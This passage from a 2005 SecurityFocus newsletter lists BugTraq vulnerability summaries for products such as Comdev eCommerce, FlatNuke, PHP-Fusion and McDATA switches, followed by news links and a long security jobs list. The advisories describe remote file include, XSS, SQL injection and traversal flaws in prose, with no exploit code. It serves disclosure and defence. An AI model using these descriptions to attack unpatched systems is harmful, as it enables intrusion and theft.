The consequences of this attack may vary depending on the type of queries that
can be influenced, and the implementation of the database. 

This issue is reported to affect Portail PHP version 2.4; Conflicting reports
indicate this information may be inaccurate.

44. McDATA E/OS Remote Denial Of Service Vulnerability
BugTraq ID: 14475
Remote: Yes
Date Published: 2005-08-04
Relevant URL: http://www.securityfocus.com/bid/14475
Summary:
McDATA Sphereon 4300, and 4500 Fabric Switches, Intrepid 6064, and 6140 Director
Switches are susceptible to a remote denial of service vulnerability when
running E/OS versions prior to 6.0.0. This issue is due to the affected devices
failing to properly handle network broadcast storms.

Hosts utilizing the SAN for storage may loose complete access to the attached
storage.

This vulnerability allows attackers to simultaneously deny storage service to
potentially numerous servers connected to a SAN.

Versions of E/OS prior to 6.0.0 are affected by this vulnerability.

45. Microsoft August Advance Notification Unspecified Security Vulnerabilities
BugTraq ID: 14476
Remote: Unknown
Date Published: 2005-08-04
Relevant URL: http://www.securityfocus.com/bid/14476
Summary:
Microsoft has released advanced notification that they will be releasing six
security bulletins on August 9, 2005.

All six of the security bulletins address Microsoft Windows.

46. Linux Kernel XFRM Array Index Buffer Overflow Vulnerability
BugTraq ID: 14477
Remote: No
Date Published: 2005-08-05
Relevant URL: http://www.securityfocus.com/bid/14477
Summary:
Linux kernel is prone to an array index buffer overflow vulnerability.  This
issue exists due to insufficient validation of user-supplied data.  The
vulnerability exists in the XFRM network architecture code.  

A successful attack can allow a local attacker to trigger an overflow, which may
lead to a denial of service condition due to memory corruption.  Arbitrary code
execution may be possible, however, this has not been confirmed.

This issue affects Linux Kernel versions 2.6.x.

47. Comdev ECommerce Config.PHP Remote File Include Vulnerability
BugTraq ID: 14478
Remote: Yes
Date Published: 2005-08-05
Relevant URL: http://www.securityfocus.com/bid/14478
Summary:
Comdev eCommerce is prone to a remote file include vulnerability.  This issue is
due to a failure in the application to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary server-side script code
on an affected computer with the privileges of the Web server process. This may
facilitate unauthorized access.

This issue reportedly affect Comdev eCommerce version 3.0; other versions may
also be vulnerable.

48. Comdev eCommerce WCE.Download.PHP Directory Traversal Vulnerability
BugTraq ID: 14479
Remote: Yes
Date Published: 2005-08-05
Relevant URL: http://www.securityfocus.com/bid/14479
Summary:
Comdev eCommerce is prone to a directory traversal vulnerability. 

A remote unauthorized user can disclose the contents of arbitrary local files
through the use of directory traversal strings '../' relative to the Web
application's root path. Exploitation of this vulnerability could lead to a loss
of confidentiality.



49. Microsoft Windows Unspecified Remote Arbitrary Code Execution Vulnerability
BugTraq ID: 14480
Remote: Yes
Date Published: 2005-08-01
Relevant URL: http://www.securityfocus.com/bid/14480
Summary:
Microsoft Windows is affected by an unspecified remote arbitrary code execution
vulnerability.

Reportedly, this issue can allow remote unauthenticated attackers to gain access
to an affected computer without any user interaction.

Reports indicate that this issue may lend itself to the development of
self-propagating malicious code due to the lack of user interaction required for
exploitation.  It is conjectured that a SYSTEM level compromise is possible.

Due to a lack of details, further information is not available at the moment. 
This BID will be updated when more information becomes available.

50. Jax PHP Scripts Multiple Cross-Site Scripting Vulnerabilities
BugTraq ID: 14481
Remote: Yes
Date Published: 2005-08-05
Relevant URL: http://www.securityfocus.com/bid/14481
Summary:
Jax PHP Scripts are affected by multiple cross-site scripting vulnerabilities. 
These issues are due to a failure in the applications to properly sanitize
user-supplied input.

An attacker may leverage any of these issues to have arbitrary script code
executed in the browser of an unsuspecting user in the context of the affected
site.  This may facilitate the theft of cookie-based authentication credentials
as well as other attacks.

51. Jax PHP Scripts Multiple Remote Information Disclosure Vulnerabilities
BugTraq ID: 14482
Remote: Yes
Date Published: 2005-08-05
Relevant URL: http://www.securityfocus.com/bid/14482
Summary:
Jax PHP Scripts are prone to multiple remote information disclosure
vulnerabilities.

These issues are due to a failure in the application to perform proper access
validation before granting access to sensitive and privileged information.

An attacker can exploit these vulnerabilities to obtain the IP's of either
banned users, or users that have made some contribution to the Web site.  Such
contributions include users who have signed petitions, sent messages using the
formmail, contributed messages and users who have suggested a link.

52. FlatNuke Multiple Cross Site Scripting Vulnerabilities
BugTraq ID: 14483
Remote: Yes
Date Published: 2005-08-05
Relevant URL: http://www.securityfocus.com/bid/14483
Summary:
FlatNuke is prone to multiple cross-site scripting vulnerabilities. These issues
are due to a failure in the application to properly sanitize user-supplied
input.

An attacker can exploit these vulnerabilities to inject html and script code
into the Web browser of an unsuspecting victim.The attacker may then steal
cookie-based authentication credentials. Other attacks are also possible.


53. PHPOpenChat Multiple HTML Injection Vulnerabilities
BugTraq ID: 14484
Remote: Yes
Date Published: 2005-08-05
Relevant URL: http://www.securityfocus.com/bid/14484
Summary:
PHPOpenChat is prone to multiple HTML injection vulnerabilities.  These issues
are due to a failure in the application to properly sanitize user-supplied input
before using it in dynamically generated content.

Attacker-supplied HTML and script code would be executed in the context of the
affected Web site, potentially allowing for theft of cookie-based authentication
credentials. An attacker could also exploit this issue to control how the site
is rendered to the user; other attacks are also possible.

54. FlatNuke User Data Arbitrary PHP Code Execution Vulnerability
BugTraq ID: 14485
Remote: Yes
Date Published: 2005-08-05
Relevant URL: http://www.securityfocus.com/bid/14485
Summary:
FlatNuke is affected by an arbitrary PHP code execution vulnerability.  This
issue is due to a failure in the application to properly sanitize user-supplied
input recorded during user registration.

An attacker can exploit this vulnerability and supply arbitrary PHP code as part
of the user data.  The attacker can then call the stored file and have the
uncommented code executed in the context of the Web server process.  This may
aid the attacker in further attacks against the underlying system. 

55. Lantronix Secure Console Server SCS820/SCS1620 Multiple Local
Vulnerabilities
BugTraq ID: 14486
Remote: No
Date Published: 2005-08-05
Relevant URL: http://www.securityfocus.com/bid/14486
Summary:
Lantronix Secure Console Server SCS820/SCS1620 devices are susceptible to
multiple local vulnerabilities.

The first issue is an insecure default permission vulnerability. Attackers may
exploit this vulnerability to write data to arbitrary files with superuser
privileges. Other attacks are also possible.

The second issue is a directory traversal vulnerability in the command-line
interface. Attackers may exploit this vulnerability to gain inappropriate access
to the underlying operating system.

The third issue is a privilege escalation vulnerability in the command-line
interface. Local users with 'sysadmin' access to the device can escape the
command-line interface to gain superuser privileges in the underlying operating
system.

The last issue is a buffer overflow vulnerability in the 'edituser' binary.
Attackers may exploit this vulnerability to execute arbitrary machine code with
superuser privileges.

The reporter of these issues states that firmware versions prior to 4.4 are
vulnerable.

56. EMC Navisphere Manager Directory Traversal And Information Disclosure
Vulnerabilities
BugTraq ID: 14487
Remote: Yes
Date Published: 2005-08-05
Relevant URL: http://www.securityfocus.com/bid/14487
Summary:
EMC Navisphere Manager is affected by directory traversal and information
disclosure vulnerabilities.  These issues are due to a failure in the
application to properly sanitize user-supplied input.

A remote unauthorized user can disclose the contents of arbitrary local files
through the use of directory traversal strings '../'.  An attacker can also
obtain the contents of arbitrary directories by appending a '.' to the end of a
request. Exploitation of these vulnerabilities could lead to a loss of
confidentiality and information disclosure.


57. Acunetix Web Vulnerability Scanner Remote Denial of Service Vulnerability
BugTraq ID: 14488
Remote: Yes
Date Published: 2005-08-06
Relevant URL: http://www.securityfocus.com/bid/14488
Summary:
Acunetix Web Vulnerability Scanner is affected by a remote denial of service
vulnerability.  This issue affects the Web sniffer component of the application.

An attacker can exploit this issue by gaining control of a server through some
means or by sending spoofed traffic to the network.  A successful attack can
result in a denial of service condition due to resource exhaustion.

Acunetix Web Vulnerability Scanner version 2.0 is affected.  Other versions may
be vulnerable as well.

58. PHP-Fusion Messages.PHP SQL Injection Vulnerability
BugTraq ID: 14489
Remote: Yes
Date Published: 2005-08-06
Relevant URL: http://www.securityfocus.com/bid/14489
Summary:
PHP-Fusion is prone to an SQL injection vulnerability.

This issue is due to a failure in the application to properly sanitize
user-supplied input to the 'messages.php' script before using it in an SQL
query.

Successful exploitation could result in a compromise of the application,
disclosure or modification of data, or may permit an attacker to exploit
vulnerabilities in the underlying database implementation.

III. SECURITYFOCUS NEWS ARTICLES
--------------------------------
1. Microsoft's "monkeys" find first zero-day exploit
By: Robert Lemos
The software giant continues its honeymonkey research, finding more than 750
exploits for Windows computers, including an attack using a vulnerability that
had not been publicly disclosed.
http://www.securityfocus.com/news/11273

2. Annual hacking game teaches security lessons
By: Robert Lemos
At the DEF CON conference, the latest version of the weekend-long Capture the
Flag game stresses code auditing as a measure of hacking skills, but also
requires participants to think about balancing attack and defense as well as
physical security.
http://www.securityfocus.com/news/11269

3. Exploit writers team up to target Cisco routers
By: Robert Lemos
Security researchers and hackers, angered by Cisco attempts to quash a recent
flaw finder's presentation, aim to reproduce and extend attacks on the
networking giant's Internet products.
http://www.securityfocus.com/news/11263

4. Reading, rooting, 'rithmetic: Preschoolers learn programming
By: Robert Lemos
One educator argues that kids should be taught computer programming and hacking
skills from preschool to reinforce creativity and technology learning.
http://www.securityfocus.com/news/11262

5. ID theft automated using keylogger Trojan
By: John Leyden
Anti-spyware researchers have uncovered a massive identity theft ring linked to
keylogging software.
http://www.securityfocus.com/news/11274

6. Former 'Spam King' pays MS $7m to settle lawsuit
By: John Leyden
Former 'Spam King' Scott Richter has agreed to pay Microsoft $7m to settle an
anti-spam lawsuit.
http://www.securityfocus.com/news/11275

7. Microsoft quells Vista virus concerns
By: John Leyden
Microsoft has confirmed that a new scripting tool will not ship as part of the
next version of its operating system, Windows Vista.
http://www.securityfocus.com/news/11271

8. OS exploits are 'old hat'
By: John Leyden
Security issues involving Cisco kit highlighted in Michael Lynn’s
presentation at Black Hat are characteristic of networking vendors in general.
http://www.securityfocus.com/news/11272

IV.  SECURITY JOBS LIST SUMMARY
-------------------------------
1. [SJ-JOB] Account Manager, Reston, VA
http://www.securityfocus.com/archive/77/407636

2. [SJ-JOB] Director, Information Security, Portland
http://www.securityfocus.com/archive/77/407637

3. [SJ-JOB] Application Security Architect, Amsterdam
http://www.securityfocus.com/archive/77/407634

4. [SJ-JOB] Sr. Security Analyst, Fredericton
http://www.securityfocus.com/archive/77/407638

5. [SJ-JOB] Forensics Engineer, London
http://www.securityfocus.com/archive/77/407635

6. [SJ-JOB] Security Consultant, Bern, Lausanne or Zurich
http://www.securityfocus.com/archive/77/407621

7. [SJ-JOB] Security Consultant, Munich or Frankfurt
http://www.securityfocus.com/archive/77/407619

8. [SJ-JOB] Compliance Officer, M4 Corridor
http://www.securityfocus.com/archive/77/407620

9. [SJ-JOB] Security Consultant, Grapevine
http://www.securityfocus.com/archive/77/407618

10. [SJ-JOB] Security Engineer, Milpitas
http://www.securityfocus.com/archive/77/407614

11. [SJ-JOB] Application Security Architect, Bern, Lausanne or Zurich
http://www.securityfocus.com/archive/77/407616

12. [SJ-JOB] Security Consultant, Bristol
http://www.securityfocus.com/archive/77/407612

13. [SJ-JOB] Developer, Boulder
http://www.securityfocus.com/archive/77/407613

14. [SJ-JOB] Developer, Boulder
http://www.securityfocus.com/archive/77/407615

15. [SJ-JOB] Security System Administrator, Albany
http://www.securityfocus.com/archive/77/407611

16. [SJ-JOB] Security System Administrator, Albany
http://www.securityfocus.com/archive/77/407609

17. [SJ-JOB] Account Manager, Seattle
http://www.securityfocus.com/archive/77/407610

18. [SJ-JOB] Manager, Information Security, Boston
http://www.securityfocus.com/archive/77/407607

19. [SJ-JOB] Security Consultant, Maidenhead, Berkshire
http://www.securityfocus.com/archive/77/407608

20. [SJ-JOB] Sr. Security Analyst, Buffalo
http://www.securityfocus.com/archive/77/407598

21. [SJ-JOB] Chief Security Strategist, Los Angeles
http://www.securityfocus.com/archive/77/407596

22. [SJ-JOB] Manager, Information Security, Oklahoma City
http://www.securityfocus.com/archive/77/407595

23. [SJ-JOB] Technology Risk Consultant, CHicago
http://www.securityfocus.com/archive/77/407594

24. [SJ-JOB] Sr. Security Analyst, Sterling
http://www.securityfocus.com/archive/77/407591

25. [SJ-JOB] Manager, Information Security, Buffalo
http://www.securityfocus.com/archive/77/407605

26. [SJ-JOB] Forensics Engineer, Countrywide
http://www.securityfocus.com/archive/77/407454

27. [SJ-JOB] Security Consultant, New York
http://www.securityfocus.com/archive/77/407456

28. [SJ-JOB] Manager, Information Security, Boston
http://www.securityfocus.com/archive/77/407453

29. [SJ-JOB] Security Engineer, Boston
http://www.securityfocus.com/archive/77/407452

30. [SJ-JOB] Security Engineer, Los Angeles
http://www.securityfocus.com/archive/77/407455

31. [SJ-JOB] Security Consultant, Pennsylvania
http://www.securityfocus.com/archive/77/407441

32. [SJ-JOB] Security Consultant, New Jersey
http://www.securityfocus.com/archive/77/407440

33. [SJ-JOB] Security Consultant, California
http://www.securityfocus.com/archive/77/407437

34. [SJ-JOB] Sales Representative, Atlanta
http://www.securityfocus.com/archive/77/407438

35. [SJ-JOB] Security Consultant, Connecticut
http://www.securityfocus.com/archive/77/407439

36. [SJ-JOB] Sales Engineer, New York
http://www.securityfocus.com/archive/77/407374

37. [SJ-JOB] Sales Engineer, El Segundo
http://www.securityfocus.com/archive/77/407375

38. [SJ-JOB] Compliance Officer, Warren
http://www.securityfocus.com/archive/77/407372

39. [SJ-JOB] Security Engineer, Edison
http://www.securityfocus.com/archive/77/407369

40. [SJ-JOB] Evangelist, Dallas
http://www.securityfocus.com/archive/77/407371

41. [SJ-JOB] Security Engineer, Chantilly
http://www.securityfocus.com/archive/77/407373

42. [SJ-JOB] Security Architect, Santa Ana
http://www.securityfocus.com/archive/77/407370

43. [SJ-JOB] Account Manager, California
http://www.securityfocus.com/archive/77/407337

44. [SJ-JOB] Security System Administrator, Atlanta
http://www.securityfocus.com/archive/77/407334

45. [SJ-JOB] Sales Representative, Dallas
http://www.securityfocus.com/archive/77/407336

46. [SJ-JOB] Sales Representative, Atlanta
http://www.securityfocus.com/archive/77/407335

47. [SJ-JOB] Technical Support Engineer, Atlanta
http://www.securityfocus.com/archive/77/407359

48. [SJ-JOB] Sales Representative, Atlanta
http://www.securityfocus.com/archive/77/407304

49. [SJ-JOB] Sales Representative, Atlanta
http://www.securityfocus.com/archive/77/407302

50. [SJ-JOB] Developer, Atlanta
http://www.securityfocus.com/archive/77/407303

51. [SJ-JOB] Sales Representative, Atlanta
http://www.securityfocus.com/archive/77/407301

52. [SJ-JOB] Security System Administrator, Springfield
http://www.securityfocus.com/archive/77/407305

53. [SJ-JOB] Application Security Engineer, New York City
http://www.securityfocus.com/archive/77/407296

54. [SJ-JOB] Security Researcher, El Sugundo
http://www.securityfocus.com/archive/77/407292

55. [SJ-JOB] Jr. Security Analyst, Redwood City
http://www.securityfocus.com/archive/77/407291

56. [SJ-JOB] Management, Chantilly
http://www.securityfocus.com/archive/77/407294

57. [SJ-JOB] Sr. Security Analyst, Atlanta  (downtown)
http://www.securityfocus.com/archive/77/407293

58. [SJ-JOB] Security Engineer, Sunnyvale
http://www.securityfocus.com/archive/77/407183

59. [SJ-JOB] Sales Engineer, Dallas
http://www.securityfocus.com/archive/77/407176

60. [SJ-JOB] Sales Engineer, Washington Metro Area
http://www.securityfocus.com/archive/77/407175

61. [SJ-JOB] Compliance Officer, Miami
http://www.securityfocus.com/archive/77/407173

62. [SJ-JOB] Security System Administrator, Western Kansas
http://www.securityfocus.com/archive/77/407174

63. [SJ-JOB] Security Consultant, New York
http://www.securityfocus.com/archive/77/407179

64. [SJ-JOB] Sales Engineer, Singapore
http://www.securityfocus.com/archive/77/407178

65. [SJ-JOB] Security Consultant, Cambridge
http://www.securityfocus.com/archive/77/407180

66. [SJ-JOB] Security Architect, Portland
http://www.securityfocus.com/archive/77/407181

67. [SJ-JOB] Sr. Security Engineer, Islandia
http://www.securityfocus.com/archive/77/407177

68. [SJ-JOB] Sr. Security Engineer, Bethesda
http://www.securityfocus.com/archive/77/407169

69. [SJ-JOB] Sr. Security Engineer, Austin
http://www.securityfocus.com/archive/77/407167

70. [SJ-JOB] Security Researcher, Austin
http://www.securityfocus.com/archive/77/407168

71. [SJ-JOB] VP / Dir / Mgr engineering, Washington
http://www.securityfocus.com/archive/77/407165

72. [SJ-JOB] Security Consultant, Boisbriand
http://www.securityfocus.com/archive/77/407166

73. [SJ-JOB] Sr. Security Analyst, central
http://www.securityfocus.com/archive/77/405941

74. [SJ-JOB] VP / Dir / Mgr engineering, Pune
http://www.securityfocus.com/archive/77/405939

75. [SJ-JOB] Quality Assurance, Cupertino
http://www.securityfocus.com/archive/77/405943

76. [SJ-JOB] Technical Marketing Engineer, Cupertino
http://www.securityfocus.com/archive/77/405946

77. [SJ-JOB] Security System Administrator, Appleton
http://www.securityfocus.com/archive/77/405947

V.   INCIDENTS LIST SUMMARY
---------------------------
VI.  VULN-DEV RESEARCH LIST SUMMARY
-----------------------------------
VII. MICROSOFT FOCUS LIST SUMMARY
---------------------------------
1. IEEE 802.1x & EAP-TLS design based on Windows 2000 Server
http://www.securityfocus.com/archive/88/407639

2. SecurityFocus Microsoft Newsletter #250
http://www.securityfocus.com/archive/88/407139

VIII. SUN FOCUS LIST SUMMARY
----------------------------
1. Securing Solaris 10
http://www.securityfocus.com/archive/92/407347

2. Accessing Solaris 10 Local Zones from the Global Zone, security risk
http://www.securityfocus.com/archive/92/406952

IX. LINUX FOCUS LIST SUMMARY
----------------------------

X.  BOOK EXCERPTS
----------------------------
1. Hacking the Code: ASP.NET Web Application Security (Syngress)
Chapter 4: Encrypting Private Data
http://www.securityfocus.com/excerpts/13

2. Exclusive Preview of Stealing the Network: How to Own an Identity
(Syngress)
Chapter 7: Death by a Thousand Cuts
http://www.securityfocus.com/excerpts/12
[ terug ]